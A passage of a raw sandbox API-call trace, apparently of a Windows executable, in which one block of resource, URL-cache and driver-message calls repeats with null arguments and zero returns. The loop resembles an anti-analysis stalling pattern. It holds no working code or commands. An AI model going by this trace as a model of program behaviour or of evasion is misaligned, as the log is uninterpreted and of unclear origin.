lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.755] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.755] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.755] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.755] GetUserDefaultLangID () returned 0x409 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.755] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.755] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.755] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.755] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.756] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.756] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.756] GetUserDefaultLangID () returned 0x409 [0185.756] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.756] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.756] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.756] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.756] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.756] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.756] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.756] GetUserDefaultLangID () returned 0x409 [0185.756] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.756] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.756] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.757] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.757] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.757] GetUserDefaultLangID () returned 0x409 [0185.757] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.757] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.757] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.757] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.757] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.757] GetUserDefaultLangID () returned 0x409 [0185.757] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.757] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.757] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.757] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.757] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.757] GetUserDefaultLangID () returned 0x409 [0185.757] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.757] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.757] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.757] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.757] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.758] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.758] GetUserDefaultLangID () returned 0x409 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.758] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.758] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.758] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.758] GetUserDefaultLangID () returned 0x409 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.758] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.758] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.758] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.758] GetUserDefaultLangID () returned 0x409 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.758] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.758] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.758] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.758] GetUserDefaultLangID () returned 0x409 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.758] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.758] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.758] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.758] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.758] GetUserDefaultLangID () returned 0x409 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.758] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.759] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.759] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.759] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.759] GetUserDefaultLangID () returned 0x409 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.759] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.759] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.759] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.759] GetUserDefaultLangID () returned 0x409 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.759] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.759] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.759] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.759] GetUserDefaultLangID () returned 0x409 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.759] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.759] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.759] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.759] GetUserDefaultLangID () returned 0x409 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.759] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.759] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.759] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.759] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.760] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.760] GetUserDefaultLangID () returned 0x409 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.760] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.760] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.760] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.760] GetUserDefaultLangID () returned 0x409 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.760] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.760] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.760] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.760] GetUserDefaultLangID () returned 0x409 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.760] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.760] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.760] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.760] GetUserDefaultLangID () returned 0x409 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.760] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.760] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.760] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.760] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.760] GetUserDefaultLangID () returned 0x409 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.760] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.761] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.761] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.761] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.761] GetUserDefaultLangID () returned 0x409 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.761] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.761] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.761] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.761] GetUserDefaultLangID () returned 0x409 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.761] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.761] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.761] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.761] GetUserDefaultLangID () returned 0x409 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.761] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.761] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.761] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.761] GetUserDefaultLangID () returned 0x409 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.761] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.761] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.761] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.761] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.762] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.762] GetUserDefaultLangID () returned 0x409 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.762] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.762] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.762] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.762] GetUserDefaultLangID () returned 0x409 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.762] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.762] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.762] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.762] GetUserDefaultLangID () returned 0x409 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", 